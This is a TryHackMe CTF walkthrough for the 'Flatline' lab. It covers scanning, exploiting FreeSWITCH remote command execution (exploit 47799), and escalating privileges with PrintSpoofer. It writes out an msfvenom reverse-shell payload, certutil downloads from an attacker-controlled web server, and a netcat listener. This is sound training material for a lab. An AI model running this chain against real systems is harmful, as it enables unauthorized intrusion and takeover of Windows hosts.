Flatline – Walkthrough En | TryHackMe – Write-up
How low are your morals?
Enumeration
Command :
nmap -sV -sC -p- -T5 10.10.135.236 -Pn
There is a service running on port 8021. It’s freeswitch.
Vulnerability research – freeswitch :
searchsploit freeswitch
The 47799.txt file contains an exploit written in python. You have to rename it to .py
Command :
mv 47799.txt 47799.py
Initial Foothold
Does the exploit work? Is the service vulnerable. We don’t get a lot of information about the service itself. The only way to find out is to test…
Command :
python3.9 47799.py 10.10.135.236 whoami
Resultat :
The exploit works. We were able to get the name of the user running the service.
It now takes the exploit to get a reverse shell.
Creating a payload
Command :
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o sr.exe
downloading the payload to the target
Setting up a Kali web server :
python3.9 -m http.server 8787
Command :
python3.9 47799.py 10.10.135.236 ‘certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe‘
Payload execution
Setting up a netcat listener :
nc -nlvp 4444
Command :
python3.9 47799.py 10.10.135.236 ‘sr.exe’
Receiving the reverse shell :
Escalade de privilège.
Command :
whoami /priv
User has SeImpersonatePrivilege rights.
Printerspoofer
To increase its privileges via SeImpersonatePrivilege, it is possible to use the exploit printerspoofer.exe available at this address.
Download :
certutil -urlcache -split -f http://10.11.38.124:8787/PrintSpoofer.exe
Commande :
PrintSpoofer.exe -i -c cmd
Please note that the command may not work the first time. Do not hesitate to restart it several times.
#
That’s all folks
Thank you for taking the trouble to come to the site to read this Write-Up
I hope he liked you more and that he taught you new things.
Feel free to leave a comment or share this article.
